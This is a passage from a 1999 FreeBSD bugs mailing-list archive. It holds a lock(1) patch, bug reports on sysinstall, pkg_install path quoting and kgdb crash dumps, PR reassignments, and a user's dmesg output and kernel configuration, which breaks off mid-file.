lock terminal forever */ /*ARGSUSED*/ int --- 68,88 ---- #include #include #include + #include #define TIMEOUT 15 ! void quit(), bye(), hi(), release(), acquire(); static void usage __P((void)); struct timeval timeout; struct timeval zerotime; struct sgttyb tty, ntty; long nexttime; /* keep the timeout time */ ! int no_timeout, /* lock terminal forever */ ! fd, ! lock_all; /* lock all ttys */ ! /*ARGSUSED*/ int *************** *** 86,91 **** --- 90,96 ---- int argc; char **argv; { + struct vt_mode mode; struct passwd *pw; struct timeval timval; time_t timval_sec; *************** *** 100,106 **** mypw = NULL; usemine = 0; no_timeout = 0; ! while ((ch = getopt(argc, argv, "npt:")) != -1) switch((char)ch) { case 't': if ((sectimeout = atoi(optarg)) <= 0) --- 105,113 ---- mypw = NULL; usemine = 0; no_timeout = 0; ! lock_all = 0; ! fd = fileno(stdin); ! while ((ch = getopt(argc, argv, "anpt:")) != -1) switch((char)ch) { case 't': if ((sectimeout = atoi(optarg)) <= 0) *************** *** 115,121 **** case 'n': no_timeout = 1; break; ! case '?': default: usage(); } --- 122,131 ---- case 'n': no_timeout = 1; break; ! case 'a': ! lock_all = 1; ! break; ! case '?': default: usage(); } *************** *** 167,172 **** --- 177,193 ---- (void)signal(SIGQUIT, hi); (void)signal(SIGTSTP, hi); (void)signal(SIGALRM, bye); + if (lock_all) + { + (void)signal(SIGUSR1, release); + (void)signal(SIGUSR2, acquire); + + mode.mode = VT_PROCESS; + mode.relsig = SIGUSR1; + mode.acqsig = SIGUSR2; + mode.frsig = SIGUSR1; /* not used */ + ioctl(fd, VT_SETMODE, &mode); + } ntimer.it_interval = zerotime; ntimer.it_value = timeout; *************** *** 198,205 **** break; (void)printf("\07\n"); if (ioctl(0, TIOCGETP, &ntty)) ! exit(1); ! } quit(); return(0); /* not reached */ } --- 219,232 ---- break; (void)printf("\07\n"); if (ioctl(0, TIOCGETP, &ntty)) ! exit(1); } ! if (lock_all) { ! /* clean up before quiting */ ! mode.mode = VT_AUTO; ! ioctl(fd, VT_SETMODE, &mode); ! ! ! } quit(); return(0); /* not reached */ } *************** *** 208,214 **** static void usage() { ! (void)fprintf(stderr, "usage: lock [-n] [-p] [-t timeout]\n"); exit(1); } --- 235,241 ---- static void usage() { ! (void)fprintf(stderr, "usage: lock [-a] [-n] [-p] [-t timeout]\n"); exit(1); } *************** *** 246,248 **** --- 273,287 ---- exit(1); } } + void + release(int arg) + { + /* always refuse to release our vty */ + ioctl(fd, VT_RELDISP, VT_FALSE); + } + + void + acquire(int arg) + { + ioctl(fd, VT_RELDISP, VT_ACKACQ); + } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 6:19:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from morpheus.internetway.net (morpheus.internetway.net [212.155.223.4]) by hub.freebsd.org (Postfix) with ESMTP id 8A92614E82 for ; Fri, 24 Dec 1999 06:19:09 -0800 (PST) (envelope-from spe@morpheus.internetway.net) Received: by morpheus.internetway.net (Postfix, from userid 500) id 46CE77C08; Fri, 24 Dec 1999 15:19:19 +0100 (CET) To: freebsd-bugs@freebsd.org Subject: BUG IN 3.4-RELEASE /stand/sysinstall Message-Id: <19991224141919.46CE77C08@morpheus.internetway.net> Date: Fri, 24 Dec 1999 15:19:19 +0100 (CET) From: spe@morpheus.internetway.net (Sebastien Petit) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi ! I have tried to upgrade my 3.3-RELEASE to 3.4-RELEASE with Upgrdae/Custom Option on sysinstall (with cdiso first and floppies after) but when I select CUSTOM in UPGRADE Manu I've got Signal 11 and the server restart... Another problem is on 3.4-RELEASE.iso cd on ftp.freebsd.org site. The tar.gz files on the Xserver directory (I think it's X335) are ALL corrupted ! tar.gz files on the ftp site directly are not. tar.gz of iso cd have same size with tar.gz on ftp site but md5 are not the same (perhaps an ASCII transfer ;-)). Result is that I cannot install XFree direclty with iso cd of ftp.freebsd.org. :-((( (there are not in gzip format). Can you try to correct bugs and redistribute 3.4-release in a good version ? Thanx. Sebastien Petit. --- spe@internetway.net spe@oleane.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 8:31:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cyberfrg.access.one.net (cyberfrg.access.one.net [216.23.8.7]) by hub.freebsd.org (Postfix) with ESMTP id 400901523E for ; Fri, 24 Dec 1999 08:31:12 -0800 (PST) (envelope-from x11@cyberfrg.access.one.net) Received: (from x11@localhost) by cyberfrg.access.one.net (8.9.3/8.9.3) id LAA21420 for freebsd-bugs@freebsd.org; Fri, 24 Dec 1999 11:38:17 -0500 (EST) Date: Fri, 24 Dec 1999 11:38:16 -0500 From: Mark Shirley To: freebsd-bugs@freebsd.org Subject: Re: BUG IN 3.4-RELEASE /stand/sysinstall Message-ID: <19991224113816.B11641@cyberfrg.access.one.net> References: <19991224141919.46CE77C08@morpheus.internetway.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <19991224141919.46CE77C08@morpheus.internetway.net>; from spe@morpheus.internetway.net on Fri, Dec 24, 1999 at 03:19:19PM +0100 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If what you say is true then there are alot of problems with the 3.4 iso. I really think that the developers should have waited alittle be longer and made sure the iso was FULLY complete and working. FreeBSD is still a wonderful OS but releasing a particular product before its ready (M$? - not a comparison) isn't very good business. BUT WE STILL LOVE YOU GUYS!! :) sorry if i'm out of place .. i just needed to express my opinion On Fri, Dec 24, 1999 at 03:19:19PM +0100, Sebastien Petit wrote: > Hi ! > > I have tried to upgrade my 3.3-RELEASE to 3.4-RELEASE with Upgrdae/Custom Option on sysinstall (with cdiso first and floppies after) but when I select CUSTOM in UPGRADE Manu I've got Signal 11 and the server restart... > Another problem is on 3.4-RELEASE.iso cd on ftp.freebsd.org site. The tar.gz files on the Xserver directory (I think it's X335) are ALL corrupted ! tar.gz files on the ftp site directly are not. tar.gz of iso cd have same size with tar.gz on ftp site but md5 are not the same (perhaps an ASCII transfer ;-)). > Result is that I cannot install XFree direclty with iso cd of ftp.freebsd.org. :-((( (there are not in gzip format). > > Can you try to correct bugs and redistribute 3.4-release in a good version ? > > Thanx. > Sebastien Petit. > --- > spe@internetway.net > spe@oleane.net > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 9:20:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 66C4F15250 for ; Fri, 24 Dec 1999 09:20:08 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA79066; Fri, 24 Dec 1999 09:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 2C93F14CA3; Fri, 24 Dec 1999 09:12:06 -0800 (PST) Message-Id: <19991224171206.2C93F14CA3@hub.freebsd.org> Date: Fri, 24 Dec 1999 09:12:06 -0800 (PST) From: mihs@wm28.csie.ncu.edu.tw To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/15667: A bug when the pathname with some space Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15667 >Category: bin >Synopsis: A bug when the pathname with some space >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 09:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ming-I Hsieh >Release: FreeBSD 3.4-RELEASE >Organization: Wireless Network and Multimedia Laboratory >Environment: FreeBSD wm27 3.4-RELEASE FreeBSD 3.4-RELEASE #0: Thu Dec 23 18:41:49 CST 1999 root@wm27:/usr/src/sys/compile/mihs i386 >Description: When the pathname with a or more spaces. the unpack in /usr/src/usr.sbin/pkg_install/lib/file.c will cause the tar can't find the +CONTENTS file. Because the if (vsystem("tar %s %s %s", args, pkg, flist ? flist : "")) { will produce a string like "tar -$(ARGS) $PATH FILENAME.tgz ...". It will make the tar can't find the right archive. >How-To-Repeat: Web Send-Pr >Fix: change "tar %s %s %s" to "tar %s '%s' %s" --- file.c.orig Sat Dec 25 01:04:09 1999 +++ file.c Sat Dec 25 01:05:08 1999 @@ -490,7 +490,7 @@ else strcpy(args, "-z"); strcat(args, " -xpf"); - if (vsystem("tar %s %s %s", args, pkg, flist ? flist : "")) { + if (vsystem("tar %s '%s' %s", args, pkg, flist ? flist : "")) { warnx("tar extract of %s failed!", pkg); return 1; } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 24 20:15:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from kedara.ipaje.com (kedara.ipaje.com [206.86.247.45]) by hub.freebsd.org (Postfix) with ESMTP id 4BCA7151E0 for ; Fri, 24 Dec 1999 20:15:45 -0800 (PST) (envelope-from jai@induslive.com) Received: from induslive.com (fwext.neomagic.com [207.21.82.4]) by kedara.ipaje.com (8.9.2/8.9.2) with ESMTP id UAA15493 for ; Fri, 24 Dec 1999 20:18:24 GMT Message-ID: <3864451E.9646B74F@induslive.com> Date: Fri, 24 Dec 1999 20:16:30 -0800 From: Jaisimha Durgam Reply-To: jai@induslive.com X-Mailer: Mozilla 4.61 [en] (X11; I; SunOS 5.6 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Subject: Patch List Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, am running FreeBSD 2.2.7. Is there a patch list that I should install to ensure that everything is Y2K compliant? Most of the fixes seem to be in 3.1. A patch list would be useful Thanks in advance. Jai Durgam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 9:33:31 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1CD8C14D9F; Sat, 25 Dec 1999 09:33:30 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA17815; Sat, 25 Dec 1999 09:33:29 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Sat, 25 Dec 1999 09:33:29 -0800 (PST) From: Message-Id: <199912251733.JAA17815@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, yokota@FreeBSD.org Subject: Re: kern/14566: Non-kernel programs have little/no control over VGA/VESA devices Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Non-kernel programs have little/no control over VGA/VESA devices Responsible-Changed-From-To: freebsd-bugs->yokota Responsible-Changed-By: phantom Responsible-Changed-When: Sat Dec 25 09:32:51 PST 1999 Responsible-Changed-Why: Yokota's area To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 9:51:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C5EF14D88; Sat, 25 Dec 1999 09:51:13 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA18862; Sat, 25 Dec 1999 09:51:12 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Sat, 25 Dec 1999 09:51:12 -0800 (PST) From: Message-Id: <199912251751.JAA18862@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: bin/10923: /usr/bin/cpp is an out-of-date wrapper for cpp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /usr/bin/cpp is an out-of-date wrapper for cpp Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: phantom Responsible-Changed-When: Sat Dec 25 09:50:30 PST 1999 Responsible-Changed-Why: Over to gcc maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 9:56:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 118C514F05; Sat, 25 Dec 1999 09:56:09 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA19150; Sat, 25 Dec 1999 09:56:08 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Sat, 25 Dec 1999 09:56:08 -0800 (PST) From: Message-Id: <199912251756.JAA19150@freefall.freebsd.org> To: timj@systembureau.com, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, phantom@FreeBSD.org Subject: Re: conf/14463: cvs pserver does not work with out-of-the-box configuration Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: cvs pserver does not work with out-of-the-box configuration State-Changed-From-To: open->feedback State-Changed-By: phantom State-Changed-When: Sat Dec 25 09:54:29 PST 1999 State-Changed-Why: As Nate described you request can't be completed. Can I close PR ? Responsible-Changed-From-To: freebsd-bugs->phantom Responsible-Changed-By: phantom Responsible-Changed-When: Sat Dec 25 09:54:29 PST 1999 Responsible-Changed-Why: I'll track response. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 11:30: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AF00C152B8 for ; Sat, 25 Dec 1999 11:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA27778; Sat, 25 Dec 1999 11:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from hunahpu.sics.se (hunahpu.sics.se [193.10.66.220]) by hub.freebsd.org (Postfix) with ESMTP id 1BDE014C08 for ; Sat, 25 Dec 1999 11:28:18 -0800 (PST) (envelope-from root@hunahpu.sics.se) Received: (from root@localhost) by hunahpu.sics.se (8.9.3/8.9.3) id UAA00522; Sat, 25 Dec 1999 20:28:16 +0100 (CET) (envelope-from root) Message-Id: <199912251928.UAA00522@hunahpu.sics.se> Date: Sat, 25 Dec 1999 20:28:16 +0100 (CET) From: assar@sics.se To: FreeBSD-gnats-submit@freebsd.org Cc: assar@sics.se X-Send-Pr-Version: 3.2 Subject: kern/15689: gdb on core-dump does not work on current-19991225 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15689 >Category: kern >Synopsis: gdb on core-dump does not work on current-19991225 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 11:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Assar Westerlund >Release: FreeBSD 4.0-19991225-CURRENT i386 >Organization: none >Environment: i386 running 4.0-19991225-CURRENT >Description: Running gdb on a crash-dump produces this: (kgdb) exec-file kernel.6 (kgdb) core-file vmcore.6 SMP -1072279740 cpus IdlePTD 0 initial pcb at 2d3500 panic messages: --- dmesg: kvm_read: invalid address (c02ca214) --- cannot read proc pointer at ff800004 (kgdb) bt #0 0x0 in ?? () (kgdb) >How-To-Repeat: crash your machine, run savecore, run gdb >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 11:41:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by hub.freebsd.org (Postfix) with SMTP id AD5741515D for ; Sat, 25 Dec 1999 11:41:13 -0800 (PST) (envelope-from wpaul@skynet.ctr.columbia.edu) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id OAA16864; Sat, 25 Dec 1999 14:45:16 -0500 From: Bill Paul Message-Id: <199912251945.OAA16864@skynet.ctr.columbia.edu> Subject: Re: kern/15689: gdb on core-dump does not work on current-19991225 To: assar@sics.se Date: Sat, 25 Dec 1999 14:45:14 -0500 (EST) Cc: bugs@freebsd.org In-Reply-To: <199912251928.UAA00522@hunahpu.sics.se> from "assar@sics.se" at Dec 25, 99 08:28:16 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1108 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Of all the gin joints in all the towns in all the world, assar@sics.se had to walk into mine and say: > >Environment: > > i386 running 4.0-19991225-CURRENT *smack!* Not enough information! What hardware do you have! Show us the output of dmesg on this machine! i386. Yeah, like that's enough information for us to go on. When are people going to get this right? > >Description: > > Running gdb on a crash-dump produces this: > > (kgdb) exec-file kernel.6 > (kgdb) core-file vmcore.6 Show us exactly what command you typed. Yes, that's important too. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "It is not I who am crazy; it is I who am mad!" - Ren Hoek, "Space Madness" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 25 11:45:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from assaris.sics.se (assaris.sics.se [193.10.66.234]) by hub.freebsd.org (Postfix) with ESMTP id 33FE814C2D for ; Sat, 25 Dec 1999 11:45:34 -0800 (PST) (envelope-from assar@assaris.sics.se) Received: (from assar@localhost) by assaris.sics.se (8.9.3/8.9.3) id UAA53101; Sat, 25 Dec 1999 20:45:34 +0100 (CET) (envelope-from assar) To: Bill Paul Cc: bugs@freebsd.org Subject: Re: kern/15689: gdb on core-dump does not work on current-19991225 References: <199912251945.OAA16864@skynet.ctr.columbia.edu> From: Assar Westerlund Date: 25 Dec 1999 20:45:34 +0100 In-Reply-To: Bill Paul's message of "Sat, 25 Dec 1999 14:45:14 -0500 (EST)" Message-ID: <5logbe6bz5.fsf@assaris.sics.se> Lines: 473 User-Agent: Gnus/5.070098 (Pterodactyl Gnus v0.98) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Paul writes: > > >Environment: > > > > i386 running 4.0-19991225-CURRENT > > *smack!* Not enough information! What hardware do you have! Show us > the output of dmesg on this machine! output from dmesg: ---------------------------------------------------------------------- Copyright (c) 1992-1999 The FreeBSD Project. Copyright (c) 1982, 1986, 1989, 1991, 1993 The Regents of the University of California. All rights reserved. FreeBSD 4.0-19991225-CURRENT #0: Sat Dec 25 19:08:41 CET 1999 root@hunahpu.sics.se:/usr/src/sys/compile/HUNAHPU Timecounter "i8254" frequency 1193182 Hz CPU: Pentium Pro (199.31-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x617 Stepping = 7 Features=0xfbff real memory = 134217728 (131072K bytes) config> di lnc0 No such device: lnc0 Invalid command or syntax. Type `?' for help. config> di le0 No such device: le0 Invalid command or syntax. Type `?' for help. config> di ie0 No such device: ie0 Invalid command or syntax. Type `?' for help. config> di fe0 No such device: fe0 Invalid command or syntax. Type `?' for help. config> di ex0 config> di ed0 config> di cs0 No such device: cs0 Invalid command or syntax. Type `?' for help. config> q avail memory = 126816256 (123844K bytes) Programming 24 pins in IOAPIC #0 FreeBSD/SMP: Multiprocessor motherboard cpu0 (BSP): apic id: 1, version: 0x00040011, at 0xfee00000 cpu1 (AP): apic id: 0, version: 0x00040011, at 0xfee00000 io0 (APIC): apic id: 2, version: 0x00170011, at 0xfec00000 Preloaded elf kernel "kernel" at 0xc0339000. Preloaded userconfig_script "/boot/kernel.conf" at 0xc033909c. Pentium Pro MTRR support enabled md0: Malloc disk npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 isab0: at device 7.0 on pci0 isa0: on isab0 ata-pci0: at device 7.1 on pci0 ata-pci0: Busmastering DMA supported ata0 at 0x01f0 irq 14 on ata-pci0 vga-pci0: irq 2 at device 12.0 on pci0 fdc0: at port 0x3f0-0x3f7 irq 6 drq 2 on isa0 fdc0: FIFO enabled, 8 bytes threshold fd0: <1440-KB 3.5" drive> on fdc0 drive 0 ata-isa0: already registered as ata0 atkbdc0: at port 0x60-0x6f on isa0 atkbd0: irq 1 on atkbdc0 vga0: at port 0x3b0-0x3df iomem 0xa0000-0xbffff on isa0 sc0: on isa0 sc0: VGA <16 virtual consoles, flags=0x200> sio0 at port 0x3f8-0x3ff irq 4 flags 0x10 on isa0 sio0: type 16550A sio1 at port 0x2f8-0x2ff irq 3 on isa0 sio1: type 16550A sio2: not probed (disabled) sio3: not probed (disabled) ppc0 at port 0x378-0x37f irq 7 flags 0x40 on isa0 ppc0: Generic chipset (EPP/NIBBLE) in COMPATIBLE mode plip0: on ppbus 0 lpt0: on ppbus 0 lpt0: Interrupt-driven port ppi0: on ppbus 0 ed0: not probed (disabled) ex0: not probed (disabled) ep0: <3Com 3C509-Combo EtherLink III> at port 0x300-0x30f irq 9 on isa0 ep0: Ethernet address 00:a0:24:77:5d:eb ep0: supplying EUI64: 00:a0:24:ff:fe:77:5d:eb APIC_IO: Testing 8254 interrupt delivery APIC_IO: routing 8254 via pin 2 SMP: AP CPU #1 Launched! ad0: ATA-3 disk at ata0 as master ad0: 775MB (1587600 sectors), 1575 cyls, 16 heads, 63 S/T, 512 B/S ad0: 16 secs/int, 1 depth queue, DMA Mounting root from ufs:/dev/ad0s1a WARNING: / was not properly dismounted ep0: starting DAD for fe80:0002::02a0:24ff:fe77:5deb ep0: DAD complete for fe80:0002::02a0:24ff:fe77:5deb - no duplicates found ---------------------------------------------------------------------- and here's my kernel configuration file: ---------------------------------------------------------------------- # # HUNAHPU- based on GENERIC -- Generic machine with WD/AHx/NCR/BTx family disks # # For more information on this file, please read the handbook section on # Kernel Configuration Files: # # http://www.freebsd.org/handbook/kernelconfig-config.html # # The handbook is also available locally in /usr/share/doc/handbook # if you've installed the doc distribution, otherwise always see the # FreeBSD World Wide Web server (http://www.FreeBSD.ORG/) for the # latest information. # # An exhaustive list of options and more detailed explanations of the # device lines is also present in the ./LINT configuration file. If you are # in doubt as to the purpose or necessity of a line, check first in LINT. # # $FreeBSD: src/sys/i386/conf/GENERIC,v 1.219 1999/12/23 05:32:53 wpaul Exp $ machine i386 cpu I686_CPU ident HUNAHPU maxusers 32 makeoptions DEBUG=-g #Build kernel with gdb(1) debug symbols options INET #InterNETworking options INET6 #IPv6 communications protocols options FFS #Berkeley Fast Filesystem options FFS_ROOT #FFS usable as root device [keep this!] options MFS #Memory Filesystem options MD_ROOT #MD is a potential root device options NFS #Network Filesystem options NFS_ROOT #NFS usable as root device, "NFS" req'ed options MSDOSFS #MSDOS Filesystem options CD9660 #ISO 9660 Filesystem options CD9660_ROOT #CD-ROM usable as root. "CD9660" req'ed options PROCFS #Process filesystem options COMPAT_43 #Compatible with BSD 4.3 [KEEP THIS!] options SCSI_DELAY=15000 #Be pessimistic about Joe SCSI device options UCONSOLE #Allow users to grab the console options USERCONFIG #boot -c editor options VISUAL_USERCONFIG #visual boot -c editor options KTRACE #ktrace(1) syscall trace support options SYSVSHM #SYSV-style shared memory options SYSVMSG #SYSV-style message queues options SYSVSEM #SYSV-style semaphores # To make an SMP kernel, the next two are needed options SMP # Symmetric MultiProcessor Kernel options APIC_IO # Symmetric (APIC) I/O # Optionally these may need tweaked, (defaults shown): #options NCPU=2 # number of CPUs #options NBUS=4 # number of busses #options NAPIC=1 # number of IO APICs #options NINTR=24 # number of INTs controller isa0 controller eisa0 controller pci0 # Floppy drives controller fdc0 at isa? port IO_FD1 irq 6 drq 2 device fd0 at fdc0 drive 0 device fd1 at fdc0 drive 1 # ATA and ATAPI devices controller ata0 at isa? port IO_WD1 irq 14 controller ata1 at isa? port IO_WD2 irq 15 controller ata2 device atadisk0 # ATA disk drives device atapicd0 # ATAPI CDROM drives device atapifd0 # ATAPI floppy drives device atapist0 # ATAPI tape drives options ATA_STATIC_ID #Static device numbering #options ATA_ENABLE_ATAPI_DMA #Enable DMA on ATAPI devices # SCSI Controllers # A single entry for any of these controllers (ahb, ahc, amd, ncr, etc...) is # sufficient for any number of installed devices. #controller ahb0 # EISA AHA1742 family #controller ahc0 # AHA2940 and onboard AIC7xxx devices #controller amd0 # AMD 53C974 (Teckram DC-390(T)) #controller dpt0 # DPT Smartcache - See LINT for options! #controller isp0 # Qlogic family #controller ncr0 # NCR/Symbios Logic #controller sym0 # NCR/Symbios Logic (newer chipsets) # #controller adv0 at isa? port ? irq ? #controller adw0 #controller bt0 at isa? port ? irq ? #controller aha0 at isa? port ? irq ? #controller aic0 at isa? port ? irq ? # SCSI peripherals # Only one of each of these is needed, they are dynamically allocated. #controller scbus0 # SCSI bus (required) #device da0 # Direct Access (disks) #device sa0 # Sequential Access (tape etc) #device cd0 # CD #device pass0 # Passthrough device (direct SCSI access) # RAID controllers #device amr0 # AMI MegaRAID #device mlx0 # Mylex DAC960 family # atkbdc0 controls both the keyboard and the PS/2 mouse controller atkbdc0 at isa? port IO_KBD device atkbd0 at atkbdc? irq 1 device psm0 at atkbdc? irq 12 device vga0 at isa? port ? conflicts # splash screen/screen saver pseudo-device splash # syscons is the default console driver, resembling an SCO console device sc0 at isa? # Enable this and PCVT_FREEBSD for pcvt vt220 compatible console driver #device vt0 at isa? #options XSERVER # support for X server #options FAT_CURSOR # start with block cursor # If you have a ThinkPAD, uncomment this along with the rest of the PCVT lines #options PCVT_SCANSET=2 # IBM keyboards are non-std # Floating point support - do not disable. device npx0 at nexus? port IO_NPX irq 13 # Power management support (see LINT for more options) device apm0 at nexus? disable flags 0x20 # Advanced Power Management # PCCARD (PCMCIA) support #controller card0 #device pcic0 at isa? #device pcic1 at isa? # Serial (COM) ports device sio0 at isa? port IO_COM1 flags 0x10 irq 4 device sio1 at isa? port IO_COM2 irq 3 device sio2 at isa? disable port IO_COM3 irq 5 device sio3 at isa? disable port IO_COM4 irq 9 # Parallel port device ppc0 at isa? port? flags 0x40 irq 7 controller ppbus0 # Parallel port bus (required) device lpt0 # Printer device plip0 # TCP/IP over parallel device ppi0 # Parallel port interface device #controller vpo0 # Requires scbus and da0 # PCI Ethernet NICs. device de0 # DEC/Intel DC21x4x (``Tulip'') device fxp0 # Intel EtherExpress PRO/100B (82557, 82558) device tx0 # SMC 9432TX (83c170 ``EPIC'') device vx0 # 3Com 3c590, 3c595 (``Vortex'') # PCI Ethernet NICs that use the common MII bus controller code. controller miibus0 # MII bus support device dc0 # DEC/Intel 21143 and various workalikes device rl0 # RealTek 8129/8139 device sf0 # Adaptec AIC-6915 (``Starfire'') device sis0 # Silicon Integrated Systems SiS 900/SiS 7016 device ste0 # Sundance ST201 (D-Link DFE-550TX) device tl0 # Texas Instruments ThunderLAN device vr0 # VIA Rhine, Rhine II device wb0 # Winbond W89C840F device xl0 # 3Com 3c90x (``Boomerang'', ``Cyclone'') # ISA Ethernet NICs. device ed0 at isa? port 0x280 irq 10 iomem 0xd8000 device ex0 at isa? port? irq? # NOTE: This removes the isa attachment so that the pccard unit numbers # come out right. device ep0 # WaveLAN/IEEE 802.11 wireless NICs. Note: the WaveLAN/IEEE really # exists only as a PCMCIA device, so there is no ISA attatement needed # and resources will always be dynamically assigned by the pccard code. #device wi0 # The probe order of these is presently determined by i386/isa/isa_compat.c. #device ie0 at isa? port 0x300 irq 10 iomem 0xd0000 #device fe0 at isa? port 0x300 irq ? #device le0 at isa? port 0x300 irq 5 iomem 0xd0000 #device lnc0 at isa? port 0x280 irq 10 drq 0 #device cs0 at isa? port 0x300 irq ? #device sn0 at isa? port 0x300 irq 10 # requires PCCARD (PCMCIA) support to be activated #device xe0 at isa? port? irq ? # Pseudo devices - the number indicates how many units to allocated. pseudo-device loop # Network loopback pseudo-device ether # Ethernet support pseudo-device sl 1 # Kernel SLIP pseudo-device ppp 1 # Kernel PPP pseudo-device tun # Packet tunnel. pseudo-device pty # Pseudo-ttys (telnet etc) pseudo-device md # Memory "disks" # The `bpf' pseudo-device enables the Berkeley Packet Filter. # Be aware of the administrative consequences of enabling this! pseudo-device bpf #Berkeley packet filter # USB support #controller uhci0 # UHCI PCI->USB interface #controller ohci0 # OHCI PCI->USB interface #controller usb0 # USB Bus (required) #device ugen0 # Generic #device uhid0 # 